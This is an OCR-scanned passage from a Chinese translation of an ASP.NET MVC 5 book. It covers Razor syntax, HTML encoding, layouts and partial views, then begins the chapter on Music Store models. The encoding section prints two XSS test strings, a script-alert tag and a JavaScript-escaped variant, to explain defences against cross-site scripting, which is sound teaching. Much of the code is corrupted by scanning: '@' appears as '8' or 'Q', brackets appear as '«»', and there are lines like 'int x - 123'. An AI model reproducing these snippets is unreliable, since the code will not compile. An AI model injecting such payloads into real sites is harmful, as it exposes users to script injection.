megacorp 的 com 属 性 的 有 效 代码 表达 式 。 但 Razor 足 够 智能 ， 可 以 辨别 出 电子 邮箱 地 址 的 一 般 
模式 ， 而 不 会 处 理 这 种 形式 的 表达 式 。 


注意 ”Razor 采 用 了 一 个 简单 算法 来 判别 看 起 来 像 电子 邮件 地 址 的 字符 串 到 
底 是 不 是 一 个 有 效 的 邮件 地 址 。 虽 然 它 不 完美 ， 但 却 可 以 适用 于 大 多 数 情况 。 
在 一 些 特殊 情况 下 , 有 效 的 邮件 地 址 可 能 会 显示 不 出 来 , 这 时 可 以 用 两 个 @@ 符 
号 转 义 一 个 @ 符 号 。 


但 是 ， 如 果 确 实 想 将 这 种 形式 的 字符 串 作 为 一 个 表达 式 ， 该 怎么 办 ? 例如 ， 回 到 这 一 节 
前 面 的 那个 例子 ， 假 设 有 下 面 的 列表 项 : 


<li>Item @item.Length</1i> 


这 种 特殊 情况 下 ,这 个 表达 式 会 匹配 成 一 个 邮件 地 址 ， 所 以 Razor 将 其 逐 字 打印 。 但 是 期 
望 的 输出 结果 是 : 


«li»Item 3«/li» 


这 里 ， 圆 括号 再 次 成 为 救星 。 任 何 时 候 Razor 有 了 二 义 性 ， 都 可 以 用 圆 括号 指明 想 要 的 
内 容 。 


«li»Item 6 (item.Length)«/li» 


正如 前 面 提 到 的 ， 可 以 使 用 @@ 符 号 来 转 义 @ 符 号 。 当 需要 显示 一 些 Twitter 处 理 程序 时 ， 
以 @ 符 号 开头 就 很 方便 : 
<p> 
You should follow 


@aspnet 
</p> 


Razor 将 尝试 解析 这 些 隐 式 代 码 表达 式 ， 但 会 以 失败 告终 。 这 种 情况 下 ， 应 该 使 用 @@ 符 
号 来 转 义 @ 符 号 ， 如 下 代码 所 示 : 
«p» 
You should follow 
@@aspnet 
</p> 
可 喜 的 是 ， 额 外 的 圆 括 号 和 转 义 序列 很 少 用 到 。 即 便 在 大 型 的 应 用 程序 中 也 很 少 使 用 。 
Razor 视 图 引擎 的 设计 理念 就 是 简单 直观 。 不 会 有 复杂 繁琐 的 语法 规则 , 为 它 的 应 用 造成 不 便 。 


3.7.3 HTML 编码 


因为 在 许多 情况 下 都 需要 用 视图 显示 用 户 输入 ， 如 博客 评论 或 产品 评论 等 ， 所 以 总 是 存 
在 潜在 的 跨 站 脚本 注入 攻击 (也 称 XSS， 这 点 将 在 第 7 章 中 详细 介绍 )。 值 得 称赞 的 是 Razor 表 达 
式 是 用 HTML 自动 编码 的 。 
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@{ 

string message = "<script>alert ('haacked!');</script>"; 
} 
<span>@message</span> 


这 段 代码 将 不 会 弹出 一 个 警告 对 话 框 ， 而 会 呈现 编码 的 HTML: 
«span»&lt;script&gt;alert(&£39;haacked!&$39;);&1t;/script&gt;«/span» 


然而 ， 如 果 想 展示 HTML 标记 ， 就 返回 一 个 System.Web.IHtmlString 对 象 的 实例 ，Razor 
并 不 对 它 进行 编码 。 例 如 ， 本 节 后 面 将 要 讨论 的 所 有 视图 辅助 类 都 是 返回 这 个 接口 的 实例 ， 
因为 它们 想 在 页 面 上 呈现 HIML。 当 然 也 可 以 创建 一 个 HtmlString 的 实例 或 者 使 用 HtmlRaw 便 
捷 方 法 : 
er 
string message = "«strong»This is bold!«/strong»"; 


) 
<span>@Html . Raw (message) «/span» 


这 样 就 会 显示 不 经 过 HTML 编码 的 消息 : 
<span><strong>This is bold!«/strong»«/span» 


虽然 这 种 自动 的 HTML 编码 通过 对 以 HTML 形式 显示 的 用 户 输入 进行 编码 有 效 地 缓和 了 
XSS 的 脆弱 性 ， 但 是 对 于 在 JavaScript 中 显示 用 户 输入 来 说 还 是 不 够 的 。 
例如 : 
<script type="text/javascript"> 
$ (function () { 
var message = 'Hello @ViewBag.Username'; 
$("4message").html (message) . show('slow'); 
); 
</script> 
在 这 段 代码 中 ， 将 一 个 字符 串 赋 给 了 JavaScript 变 量 message， 而 且 该 字符 串 中 包含 了 用 
户 通过 Razor 表 达 式 提供 的 用 户 名 。 
通过 jQuery 的 HIML 方 法 ， 变 量 message 将 被 设置 为 一 个 属性 值 为 "message" 的 DOM 元 
素 。 尽 管 在 message 字 符 串 中 对 用 户 名 进行 了 HTML 编码 ， 但 是 仍然 具有 潜在 的 XSS 脆 弱 性 。 
例如 ， 如 果 用 户 提供 以 下 的 字符 串 作 为 用 户 名 ，HTML 将 被 设置 为 一 个 脚本 标签 : 


\x3cscript\x3e%20alert (\x27pwnd\x27)%20\x3c/script\x3e 


当 在 JavaScript 中 将 用 户 提供 的 值 赋 给 变量 时 ， 要 使 用 JavaScript 字 符 串 编码 而 不 仅仅 是 
HTML 编 码 ， 记 住 这 一 点 是 很 重要 的 。 也 就 是 要 使 用 @Ajax.JavaScriptStringEncode 方 法 对 用 
户 输入 进行 编码 。 下 面 是 使 用 了 这 个 方法 的 相同 代码 ， 这 样 就 可 以 有 效 地 避免 XSS 攻 击 : 


<script type="text/javascript"> 
$(function () { 
var message = 'Hello 8Ajax.JavaScriptStringEncode (ViewBag.Username)'; 
$("4message").html (message) . show('slow'); 
H); 
</script> 
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注意 ”理解 HTML 和 JavaScript 编 码 的 安全 隐患 是 很 重要 的 。 不 正确 的 编码 
会 使 网 站 和 用 户 处 在 危险 境地 。 这 些 内 容 在 第 7 章 会 进行 详细 探讨 。 


3.74 ”代码 块 


Razor 在 视图 中 除了 支持 代码 表达 式 以 外 ， 还 支持 代码 块 。 回顾 前 面 的 视图 示例 ， 其 中 有 
一 条 foreach 语 句 : 
@foreach (var item in stuff) { 


<li>The item name is 8item.«/li» 
} 


这 段 代 码 迭 代 了 一 个 数组 ， 并 为 数组 中 的 每 一 项 显示 了 一 个 列表 项 元 素 。 

这 个 语句 有 趣 的 地 方 是 ，foreach 语 句 会 自动 转换 为 带 有 起 始 <li> 标 签 的 标记 。 当 看 到 这 
段 代码 时 ， 人 们 有 时 可 能 会 假定 是 换行 符 导致 了 这 个 转换 的 发 生 ， 但 是 下 面 有 效 的 代码 片段 
证 实 了 情况 并 非 如 此 : 

@foreach (var item in stuff) («li»The item name is @item.</1i>} 

因为 Razor 理 解 HIML 标记 语言 的 结构 , 所 以 当 <li> 标 签 关闭 时 它 也 可 以 自动 地 转 回 代码 。 
因此 ， 这 里 不 需要 划 定 右 花 括号 。 

相 比 之 下 ， 对 于 同样 用 于 代码 和 标记 之 间 转 换 的 代码 ，Web Forms 视 图 引擎 就 不 得 不 显 
式 地 指出 ， 如 下 所 示 : 


<% foreach(var item in stuff) { $» 
Xli»The item name is <%: item $5.«/li» 


<% ) $5 
代码 块 除了 需要 @ 符 号 分 割 之 外 还 需要 使 用 花 括 号 。 下 面 是 一 个 多 行 代码 块 的 例子 : 
e 

NE s = "One line of code."; 


ViewBag.Title "Another line of code"; 
) 


另外 一 个 例子 是 当 调 用 没有 返回 值 的 方法 (也 就 是 返回 类 型 为 void) 时 : 
@{Html .RenderPartial ("SomePartial");} 


注意 代码 块 中 的 语句 (比如 foreach 循 环 和 if 代 码 块 中 的 语句 ) 是 不 需要 使 用 花 括 号 的 , 因为 
Razor 引 擎 有 这 些 C# 关 键 字 的 专门 知识 。 
下 节 将 对 简洁 Razor 语 法 进行 快速 介绍 ， 并 展示 各 种 Razor 语 法 及 其 与 Web Forms 的 对 比 。 


3.7.5 “Razor 语 法 示例 


本 节 通 过 示例 来 说 明 常 见 用 途 下 的 Razor 语 法 。 
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1. 隐 式 代码 表达 式 
如 前 所 述 ， 代 码 表 达 式 将 被 计算 并 将 值 写 入 到 响应 中 ， 这 就 是 在 视图 中 显示 值 的 一 般 


原理 。 


方法 


这 一 


块 之 
纯 文 


«span»8model.Message«c/span» 
Razor 中 的 隐 式 代码 表达 式 总 是 采用 HTML 编码 方式 。 
2. 显 式 代码 表达 式 
代码 表达 式 的 值 将 被 计算 并 写 入 到 响应 中 ， 这 就 是 在 视图 中 显示 值 的 一 般 原 理 。 
«span»l + 2 = @(1 + 2)</span> 
3. 无 编码 代码 表达 式 
有 些 情况 下 ， 需 要 显 式 地 泻 染 一 些 不 应 该 采用 HTMLIL 编 码 的 值 ， 这 时 可 以 采用 Html.Raw 
来 保证 该 值 不 被 编码 。 
«span»8Html.Raw (model.Message)«/span» 
4. 代码 块 
不 像 代 码 表达 式 先 求 得 表达 式 的 值 , 然后 再 输出 到 响应 , 代码 块 是 简单 地 执行 代码 部 分 。 
点 对 于 声明 以 后 要 使 用 到 的 变量 是 有 帮助 的 。 
er : 
int x - 123; 


string y = "because."; 
) 


5. 文本 和 标记 相 结合 
这 个 例子 显示 了 在 Razor 中 混用 文本 和 标记 的 概念 ， 具 体 如 下 : 


@foreach (var item in items) ( 
«span»Item 8item.Name.«/span» 
) 


6. 混合 代码 和 纯 文 本 


Razor 碍 找 标签 的 开始 位 置 以 确定 何 时 将 代码 转换 为 标记 。 然 而 ， 有 时 可 能 想 在 一 个 代码 
后 立即 输出 纯 文 本 。 例 如 ， 在 下 面 的 这 个 例子 中 就 是 展示 如 何在 一 个 条 件 语句 块 中 显示 
本 。 

Qif (showMessage) { 


«text»This is plain text</text> 
} 


或 


Qif (showMessage) { @:This is plain text. 
H 
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注意 Razor 可 采用 两 种 不 同 的 方式 来 混合 代码 和 纯 文 本 。 第 一 种 方式 是 使 用 <texP> 标 签 ， 
这 样 只 是 把 标签 内 容 写 入 到 响应 中 ， 而 标签 本 身 则 不 写 入 。 笔 者 个 人 喜欢 采用 这 种 方式 ， 因 
为 它 具 有 逻辑 意义 。 如 果 想 转 回 标记 ， 只 需要 使 用 一 个 标签 就 行 了 。 
其 他 一 些 人 喜欢 第 二 种 方式 ， 该 方式 使 用 一 种 特殊 的 语法 , 来 实现 从 代码 到 纯 文本 的 
转换 ， 但 是 这 种 方法 每 次 只 能 作用 于 一 行文 本 。 

T. 转 义 代码 分 隔 符 


正如 本 章 前 面 所 阐述 的 ， 可 以 用 “@@” 来 编码 “@” 以 达到 显示 “@” 的 目的 。 此 外 ， 
始终 都 可 以 选择 使 用 HIML 编码 来 实现 。 
Razor: 


The ASP.NET Twitter Handle is &#64;aspnet 
或 

The ASP.NET Twitter Handle is @@aspnet 

8. 服务 器 端的 注释 

Razor 为 注释 一 块 代码 和 标记 提供 了 美观 的 语法 。 


@* 

This is a multiline server side comment. 

@if (showMessage) { 
<h1>@ViewBag.Message</h1> 


} 
All of this is commented out. 
*e 


9. 调用 泛 型 方法 

这 与 显 式 代码 表达 式 相 比 基 本 上 没有 什么 不 同 。 即 便 如 此 ， 在 试图 调用 泛 型 方法 时 仍 有 
许多 人 面临 困境 。 困 惑 主要 在 于 调用 泛 型 方法 的 代码 包含 尖 括号 。 正 如 前 面 学 习 的 ， 尖 括号 
会 导致 Razor 转 回 标记 ,除非 整个 表达 式 用 圆 括号 括 起 来 。 Razor 和 Web Forms 中 的 泛 型 使 用 对 
比如 下 所 示 : 


@ (Htm1.SomeMethod«AType» () ) 


3776 布局 


Razor 的 布局 有 助 于 使 应 用 程序 中 的 多 个 视图 保持 一 致 的 外 观 。 如 果 熟 悉 Web Forms 的 话 ， 
其 中 母 版 页 和 布局 的 作用 是 相同 的 ， 但 是 布局 提供 了 更 加 简洁 的 语法 和 更 大 的 灵活 性 。 
可 使 用 布局 为 网 站 定义 公共 模板 (或 只 是 其 中 的 一 部 分 )。 公 共 模 板 包含 一 个 或 多 个 占 位 
符 ， 应 用 程序 中 的 其 他 视图 为 它 ( 们 ) 提 供 内 容 。 从 某 些 角度 来 看 ， 布 局 很 像 视图 的 抽象 基 类 。 
下 面 来 看 一 个 非常 简单 的 布局 。 这 里 称 这 个 布局 文件 为 SiteLayout.cshtml: 


<!DOCTYPE html» 
«html» 
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<head><title>@ViewBag.Title</title></head> 
<body> 

<hl>@ViewBag.Title</hl> 

«div id="main-content">@RenderBody () </div> 
</body> 
</html> 


它 看 起 来 像 一 个 标准 的 Razor 视 图 ， 但 需要 注意 的 是 在 视图 中 有 一 个 @RenderBody 调 用 


o 


这 是 一 个 占 位 符 ， 用 来 标记 使 用 这 个 布局 的 视图 将 泻 染 它们 的 主要 内 容 的 位 置 。 多 个 Razor 
视图 现在 可 以 利用 这 个 布局 来 显示 一 致 的 外 观 。 


接 下 来 看 一 个 使 用 这 个 布局 的 例子 Index.cshtml: 


@{ 
Layout = "~/Views/Shared/SiteLayout.cshtml"; 
ViewBag.Title = "The Index!"; 

) 

<p>This is the main content!«/p» 


上 面 的 这 个 视图 通过 Layout 属 性 来 指定 布局 。 当 泻 染 这 个 视图 时 ， 它 的 HTML 内容 将 被 


放 在 SiteLayout.cshtml 中 id 属性 值 为 main-content 的 DIV 元 素 中 ， 最 后 生成 的 HTML 标 记 如 下 
所 示 : 


<!DOCTYPE html» 
<html> 
<head><title>The Index!</title></head> 
<body> 
<hl>The Index!</hl> 
<div id="main-content"><p>This is the main content!</p></div> 
</body> 
</html> 


注意 视图 内 容 ， 其 中 标题 和 hl 标题 都 被 标记 为 粗 体 显示 以 强调 这 些 都 是 由 视图 提供 的 ， 


除 此 之 外 的 所 有 其 他 内 容 都 由 布局 提供 。 


布局 可 能 有 多 个 节 。 例如， 下 面 示例 在 前 面 的 布局 SiteLayout.cshtml 的 基础 上 添加 一 个 页 


脚 节 : 


E 


<!DOCTYPE html» 
«html» 
Xhead»«title»G(ViewBag.Title«/title»«/head» 
«body» 
«hl»8ViewBag.Title«c/hl» 
«div id-"main-content"»(RenderBody () </div> 
«footer»GRenderSection("Footer")«/footer» 
</body> 
</html> 


在 不 做 任何 改变 的 情况 下 再 次 运行 前 面 的 视图 , 将 会 抛 出 一 个 异常 , 提示 没有 定义 Footer 
默认 情况 下 ， 视 图 必须 为 布局 中 定义 的 每 一 个 节 提 供 相应 内 容 。 
这 是 更 新 后 的 视图 ， 如 下 所 示 : 


ec 
Layout = "-/Views/Shared/SiteLayout.cshtml"; 
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ViewBag.Title = "The Index!"; 


f 
<p>This is the main content!</p> 


@section Footer { 
This is the <strong>footer</strong>. 
} 


@section 语 法 为 布局 中 定义 的 一 个 节 指 定 了 内 容 。 

刚才 指出 ， 默认 情况 下 ， 视 图 必须 为 布局 中 定义 的 每 一 个 节 提供 内 容 。 那 么 当 向 一 个 布 
局 中 添加 一 个 新 节 时 会 如 何 ? 这 样 会 使 引用 该 布局 的 每 一 个 视图 都 不 能 正常 运行 吗 ? 

然而 ，RenderSection 方 法 有 一 个 重 载 版 本 ， 人 允许 指定 不 需要 的 节 。 可 以 给 required 参 数 传 
递 一 个 false 值 来 标记 Footer 节 是 可 选 的 ; 


«footer»(RenderSection("Footer", required: false)</footer> 


但 是 ， 如 果 能 为 视图 中 没有 定义 的 节 定 义 一 些 默 认 内 容 ， 岂 不 更 好 ? 这 里 提供 了 一 个 方 
法 ， 虽 然 有 点 繁 珊 ， 但 还 是 能 用 : 
<footer> 
Qif (IsSectionDefined("Footer")) ( 


RenderSection ("Footer"); 
) 
else ( 
«span»This is the default footer.«/span» 
) 
«/footer» 
第 15 章 会 介绍 Razor 语 法 的 一 个 高 级 特性 ， 称 为 模板 Razor 委 托 ， 利 用 它 可 以 实现 一 个 更 
好 的 方法 来 解决 这 个 问题 。 


MVC 5 中 默认 的 布局 变化 

当 使 用 Internet 或 Intranet 模 板 创建 一 个 新 的 MVC 5 应 用 程序 时 ， 我 们 会 得 到 一 个 使 用 
Bootstrap 框 架 应 用 基本 样式 的 默认 布局 。 

默认 的 布局 设计 在 这 些 年 成 熟 了 不 少 。 在 MVC 4 之 前 ， 默 认 模 板 的 设计 非常 Spartan 一 一 
在 蓝 色 的 背景 上 只 有 一 片 白色 区 域 。MVC 4 对 默认 的 模板 进行 了 彻底 的 重新 编写 ， 提 供 了 更 
好 的 可 视 化 设计 ， 并 通过 CSS 媒 体 查 询 (CSS Media Queries) 提 供 了 自 适 应 的 设计 。 这 是 一 个 极 
大 的 改进 ， 但 是 用 到 的 只 是 自 定义 的 HIML 和 CSS。 

如 第 1 章 所 述 , 默认 的 模板 已 被 更 新 , 使 用 了 流行 的 Bootstrap 框 架 。 它 具有 MVC 4 模板 更 
新 的 一 些 好 处 ， 但 是 也 添加 了 更 多 的 好 处 。 第 16 章 会 对 这 些 内 容 进行 详细 介绍 。 


3.7.7 ViewStart 


在 前 面 的 例子 中 ， 每 一 个 视图 都 是 使 用 Layout 属 性 来 指定 它 的 布局 。 如 果 多 个 视图 使 用 
同一 个 布局 ， 就 会 产生 元 余 ， 并 且 很 难 维护 。 

_ViewStartcshtml 页 面 可 用 来 消除 这 种 元 余 。 这 个 文件 中 的 代码 先 于 同 目录 下 任何 视图 代 
码 的 执行 。 这 个 文件 也 可 以 递归 地 应 用 到 子 目 录 下 的 任何 视图 。 

当 创 建 一 个 默认 的 ASPNET MVC 项 目 时 ， 你 将 会 注意 到 在 Views 目 录 下 会 自动 添加 一 个 
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_ViewStart.cshtml 文 件 ， 它 指定 了 一 个 默认 布局 。 


ec 
Layout = "-/Views/Shared/ Layout.cshtml"; 
) 


因为 这 个 代码 先 于 任何 视图 运行 ， 所 以 一 个 视图 可 以 重 写 Layout 属 性 的 默认 值 ， 从 而 重 
新 选择 一 个 不 同 的 布局 。 如 果 一 组 视图 拥有 共同 的 设置 ,那么 _ViewStart.cshtml 文 件 就 有 了 用 
武之 地 ， 因 为 我 们 可 以 在 它 里 面 对 共同 的 视图 配置 进行 统一 设置 。 如 果 有 视图 需要 窗 盖 统一 
的 设置 ， 我 们 只 需要 修改 对 应 的 属性 值 即 可 。 


3.8 指定 部 分 视图 


除了 返回 视图 之 外 ， 操 作 方 法 也 可 以 通过 PartialView 方 法 以 PartialViewResult 的 形式 返 
部 分 视图 。 下 面 是 一 个 例子 : 


public class HomeController : Controller { 
public ActionResult Message() { 
ViewBag.Message = "This is a partial view."; 
return PartialView(); 


) 


a 


) 


这 种 情形 下 ， 泻 染 的 是 视图 Message.cshtml， 但 是 如 果 布 局 是 由 _ViewStartcshtml 页 面 指 
定 (而 不 是 直接 在 视图 中 ) 的 ， 将 无 法 泻 染 布局 。 
除了 不 能 指定 布局 之 外 ， 部 分 视图 看 起 来 和 正常 视图 没有 分 别 : 


<h2>@ViewBag.Message</h2> 


在 使 用 Ajax 技 术 进行 部 分 更 新 时 , 部 分 视图 是 很 有 用 的 。 下面 展 示 了 一 个 非常 简单 的 例子 ， 
使 用 jQuery 将 一 个 部 分 视图 的 内 容 加 载 到 一 个 使 用 了 Ajax 调 用 的 当前 视图 中 : 


<div id="result"></div> 


@section scripts { 

<script type="text/javascript"> 

$(function()( 
$('f£result').1load('/home/message'); 

n; 

</script> 

F 


前 面 的 代码 使 用 jQuery 的 load 方 法 向 Message 操 作 方 法 发 出 一 个 Ajax 请 求 ， 而 后 使 用 请 求 
的 结果 更 新 id 属性 值 为 result 的 DIV 元 素 。 

想 要 看 到 前 面 两 节 中 描述 的 指定 视图 和 部 分 视图 的 例子 ， 可 以 使 用 NuGet 将 Wrox. 
ProMvc5.Views.SpecifyingViews 包 安装 到 一 个 默认 的 ASPNETMVC 5 项 目 中 ， 像 下 面 这 样 : 


Install-Package Wrox.ProMvc5.Views.SpecifyingViews 


这 将 在 项 目的 示例 目录 下 添加 一 个 包含 有 多 个 操作 方法 的 控制 器 示例 ， 每 一 个 操作 方法 
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以 不 同 的 方式 指定 一 个 视图 。 在 项 目 中 按 下 Cel+F5 键 并 分 别 访问 下 述 目录 运行 这 些 示 例 操作 


方法 : 
e /sample/index 
e /sample/index2 
e /sample/index3 
e /sample/partialviewdemo 


3.9 小 结 


视图 引擎 的 用 途 非常 具体 有 限 。 它 们 的 目的 是 获取 从 控制 器 传递 给 它们 的 数据 ， 


生成 


经 过 格式 化 的 输出 ， 通 常 是 HTML 格 式 。 除 了 这 些 简单 的 职责 或 “关注 点 ”之 外 ， 作 为 开发 
AR, 还 可 以 以 任意 想 要 的 方式 来 实现 视图 的 目标 。Razor 视 图 引擎 简单 直观 的 语法 使 得 编写 


丰富 安全 的 页 面 极其 容易 ， 而 不 必 考 虑 编写 页 面 的 难 易 程度 。 


8 
p 


本 章 主要 内 容 

e 如 何 为 MVC Music Store 建 模 
e 基 架 的 含义 

。 编辑 专辑 的 方法 

e 模型 绑 定 


本 章 代码 下 载 : 

在 以 下 网 址 的 Download Code 选 项 卡 中 ， 可 找到 本 章 的 代码 下 载 : http:/www.wrox.com/ 
go/proaspnetmvc5。 本 章 的 代码 包含 在 文件 MvcMusicStore.C04.zip 中 。 该 文件 包含 了 本 章 的 完 
整 项 目 。 


第 3 章 在 讨论 强 类 型 视图 时 ， 提 到 了 模型 。 本 章 将 详细 学 习 模型 。 

模型 这 个 词 在 软件 开发 领域 被 多 次 引用 ， 代 表 数 百 种 不 同 的 概念 ， 如 成 熟 度 模型 、 设 计 
模型 、 威 胁 模型 和 进程 模型 等 。 很 少 有 开发 会 议会 自始至终 都 不 谈 一 两 种 模型 的 。 即便 把 “ 模 
型 ”这 个 术语 的 范围 限定 在 MVC 设 计 模式 的 上 下 文中 ， 也 仍然 可 以 探讨 面向 业务 的 模型 对 象 
和 面向 视图 的 模型 对 象 哪个 更 具 优势 (第 3 章 中 讨论 了 这 方面 的 内 容 )。 

本 章 要 讨论 的 是 那些 发 送信 息 到 数据 库 , 执行 业务 计算 并 在 视图 中 泻 染 的 模型 对 象 。 换 句 话 
说 ， 这 些 对 象 代表 着 应 用 程序 关注 的 域 ， 模 型 就 是 要 显示 、 保 存 、 创 建 、 更 新 和 删除 的 对 象 。 

为 了 仅 使 用 模型 对 象 的 定义 就 能 构建 出 应 用 程序 特性 , ASPNET MVC 5 提供 了 许多 工具 
和 特性 。 现 在 就 应 该 坐 下 来 好 好 想 一 想 要 解决 的 问题 (比如 怎样 让 一 个 用 户 购 买 音乐 )， 然 后 
为 了 呈现 涉及 的 主要 对 象 ， 就 要 编写 一 些 简单 的 C# 类 ， 比 如 Album 类 、ShoppingCart 类 和 User 
类 。 准 备 好 了 上 面 的 工作 ， 接 下 来 就 可 以 使 用 MVC 提 供 的 工具 来 为 每 个 模型 对 象 的 标准 索引 、 
创建 、 编 辑 和 删除 功能 构建 控制 器 和 视图 。 这 个 构建 工作 称 为 基 架 (scaffolding)， 在 讨论 基 架 之 
前 ， 需 要 首先 了 解 一 些 模型 。 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


4.1 为 MVC Music Store 建 模 


我 们 来 看 一 个 例子 。 本 节 将 继续 探讨 ASPNET MVC Music Store 项 目 ， 综 合 运 用 前 面 学 
习 的 关于 控制 器 和 视图 的 知识 ， 并 加 入 模型 作为 第 三 个 元 素 。 


注意 第 2 章 在 介绍 ASPNET MVC Music Store 项 目 时 ， 讲 到 了 如 何在 一 个 新 的 
ASPNETMVC 项 目 中 创建 控制 器 。 本 节 紧 接着 该 主题 继续 讨论 。 为 了 简单 起 见 ， 
也 为 了 让 本 章 可 被 独立 阅读 ， 我 们 将 首先 创建 一 个 新 的 ASPNETMVC 应 用 程序 。 
我 们 将 这 个 项 目 命名 为 MvcMusicStore， 但 是 读者 可 以 自由 命名 。 


首先 ， 从 Visual Studio 中 选择 File | New Project 菜 单 命令 ， 创 建 一 个 新 的 ASPNET Web 
Application， 如 图 4-1 所 示 。 


imerts ual studio: OW PejecsWroM cO E) [ Bewe- | 


Z Create director for solution 
C Add te source control 


EEC 


给 项 目 命名 后 , Visual Studio 将 打开 如 图 4-2 所 示 的 对 话 框 ,在 这 里 , 可 以 告诉 Visual Studio 


我 们 想 要 使 用 MVC 项 目 模板 。 
TT — 
mmm 
a - N MEET SEEN 
Empty Web Forms MC Web API E 
p 


图 4-2 
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MVC 模 板 提供 了 启动 应 用 程序 需要 的 所 有 项 : 一 个 基本 的 布局 视图 、 一 个 带 有 用 户 登录 
链接 的 默认 首页 、 一 个 初始 的 样式 表 和 一 个 相对 较 空 的 Models 文 件 夹 。Models 文 件 夹 下 有 两 
个 文件 ，AccountViewModels.cs 和 IdentityModels.cs 文 件 ( 见 
图 4-3)。 这 两 个 文件 都 与 用 户 账户 管理 有 关 。 现 在 不 需要 (108 90959 《| 
担心 它们 ,第 7 章 在 讨论 身份 验证 和 身份 时 将 详细 对 它们 进 
行 介绍 。 不 过 ， 我 们 在 构建 应 用 程序 的 其 余部 分 时 ， 使 用 
的 是 与 ASPNET MVC 中 的 账户 管理 系统 相同 的 标准 视图 、 
模型 和 控制 器 ， 这 是 一 个 好 消息 。 

为 什么 Models 文 件 夹 几 乎 是 空 的 呢 ? 这 是 因为 项 目 模 
板 不 知道 我 们 在 哪个 域 中 工作 ， 也 不 知道 我 们 想 要 解决 什 
么 样 的 问题 。 


这 个 时 候 ， 可 能 连 我 们 自己 也 不 明确 究竟 要 解决 什么 De 
问题 ! 这 就 需要 与 客户 和 业务 负责 人 进行 沟通 交流 ， 做 一 ee 
些 初步 的 原型 设计 或 者 使 用 测试 驱动 开发 来 充实 设计 。 D E Metais Tess 
ASPNET MVC 框 架 并 没有 规定 初始 阶段 的 过 程 和 方法 。 图 43 


最 终 可 能 决定 要 构建 的 音乐 商店 首先 应 具有 列举 、 创 
建 、 编 辑 和 删除 专辑 信息 的 功能 。 要 在 Models 文 件 夹 中 添加 一 个 新 的 Album 类 ， 可 以 右 击 
Models 文 件 夹 ， 选 择 Add... Class， 并 将 新 类 命名 为 Album。 保留 现 有 的 using 和 namespace 语 句 
不 变 ， 并 在 新 建 的 Album 类 中 输入 程序 清单 4-1 中 所 示 的 属性 : 


程序 清单 4-1 Album 模 型 


public class Album 

{ 
public virtual int AlbumId { get; set; } 
public virtual int GenreId { get; set; } 
public virtual int ArtistId ( get; set; } 
public virtual string Title ( get; set; } 
public virtual decimal Price ( get; set; } 
public virtual string AlbumArtUrl ( get; set; ) 
public virtual Genre Genre ( get; set; } 
public virtual Artist Artist ( get; set; ] 

) 


由 于 最 后 两 个 属性 引用 的 Genre 和 Artist 类 还 未 被 定义 ， 所 以 这 个 类 还 不 能 通过 编译 。 不 
过 这 不 是 问题 ， 接 下 来 就 定义 它们 。 


XEX& Visual Studio 有 一 段 很 有 用 的 代码 ， 用 于 创建 自动 实现 的 属性 (使 用 {get; 
set} 语 法 实现 的 属性 ， 如 上 面 的 代码 所 示 )。 为 快速 创建 自动 实现 的 属性 ， 首 先 
需要 键入 prop， 然 后 按 Tab 键 两 次 ， 展开 Visual Studio 提 供 的 这 段 代 码 ， 并 将 光标 
选择 定位 到 属性 类 型 文本 上 。 这 段 代 码 的 默认 属性 值 是 int 类 型 ; 如 果 需 要 改变 
其 类 型 (如 改 为 string、decimal 等 )， 可 以 直接 键入 新 类 型 。 接 下 来 ， 按 Tab 键 两 次 ， 
前 进 到 属性 名 。 键 入 属性 名 后 ， 可 以 按 Enter 键 前 进 到 该 行 末尾 。 创 建新 的 模型 
类 时 ， 这 段 代 码 十 分 方便 。 
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专辑 模型 的 主要 目的 是 模拟 音乐 专辑 的 特性 ， 如 标题 和 价格 。 每 一 个 专辑 也 都 有 一 个 与 
之 相关 的 艺术 家 ， 使 用 新 的 Artist 类 建 模 。 为 此 ， 在 Models 文 件 夹 中 添加 一 个 新 的 Artist 类 ， 
并 输入 如 程序 清单 4-2 所 示 的 属性 : 


程序 清单 4-2 ”Artist 模 型 


public class Artist 
t 


public virtual int ArtistId ( get; set; } 
public virtual string Name ( get; set; ) 
) 
从 上 面 的 代码 中 可 能 会 注意 到 , 每 个 Album 都 有 Artist 和 ArtistId 两 个 属性 来 管理 与 之 相关 
的 艺术 家 。 这 里 ，Artist 属 性 称 为 导航 属性 (navigational property)， 主 要 是 因为 对 于 一 个 专辑 ， 
可 以 通过 点 操作 符 来 找到 与 之 相关 的 艺术 家 (favoriteAlbum ArtisD。 
这 里 称 ArtistId 属 性 为 外 键 属性 (foreign key property)， 如 果 了 解 一 点 数据 库 知 识 的 话 ， 就 
会 知道 艺术 家 和 专辑 会 被 保存 在 两 个 不 同 的 表 中 ， 并 且 一 个 艺术 家 可 能 与 多 个 专辑 有 关联 。 
因为 艺术 家 记录 表 和 专辑 记录 表 存在 着 外 键 关 系 ， 所 以 这 里 就 将 艺术 家 的 外 键 值 柑 入 到 了 专 
辑 的 模型 中 。 
模型 关系 
因为 外 键 是 关系 型 数据 库 管理 的 实现 细节 ， 所 以 一 些 读者 可 能 不 喜欢 在 模型 中 利用 外 键 
属性 。 在 模型 对 象 中 并 不 是 必须 使 用 外 键 属性 ， 所 以 可 以 不 考虑 它 。 
因为 外 键 可 以 为 将 要 使 用 的 工具 提供 很 多 便利 ， 所 以 在 本 章 利用 了 外 键 属性 。 


一 个 专辑 还 会 有 一 个 相关 的 流派 ， 一 种 流派 也 会 对 应 一 个 相关 专辑 列表 。 在 Models 文 件 
夹 中 创建 一 个 Genre 类 ， 并 添加 如 程序 清单 4-3 所 示 的 属性 : 


程序 清单 4-3 ”Genre 模 型 


public class Genre 
{ 


public virtual int GenreId { get; set; } 
public virtual string Name ( get; set; } 
public virtual string Description ( get; set; } 
public virtual List«Album» Albums { get; set; } 


} 


这 里 可 能 会 注意 到 所 有 的 属性 都 是 virtual 类 型 的 ， 本 章 后 面 将 会 讨论 这 个 问题 。 到 目前 
为 止 ， 这 三 个 简单 类 的 定义 就 是 建立 模型 的 开端 ， 其 中 包含 了 利用 基 架 生成 控制 器 和 一 些 视 
图 ， 甚 至 是 创建 数据 库 需 要 的 所 有 内 容 。 

现在 已 经 为 三 个 模型 类 添加 完了 代码 ， 可 以 编译 应 用 程序 了 。 在 Visual Studio 中 ， 既 可 以 
使 用 Build | Build Solution 菜 单项 ， 也 可 以 使 用 键盘 快捷 键 Crl+ShiftrB 来 编译 应 用 程序 。 编 译 
新 添加 的 模型 类 很 重要 ， 这 有 两 个 原因 : 

e 可 以 快速 检查 出 代码 中 存在 的 简单 语法 错误 。 
